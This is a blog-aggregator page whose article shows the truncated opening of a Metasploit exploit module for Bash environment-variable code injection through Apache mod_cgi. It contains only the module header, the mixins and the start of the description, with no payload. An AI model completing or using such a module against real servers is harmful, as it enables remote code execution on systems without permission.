Quantcast
Channel: Il Bloggatore » Environment variable
Viewing all articles
Browse latest Browse all 14

Apache mod_cgi Bash Environment Variable Code Injection

$
0
0
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking   include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager   def initialize(info = {}) super(update_info(info, 'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection', 'Description' => %q{ This module exploits a...

Viewing all articles
Browse latest Browse all 14

Trending Articles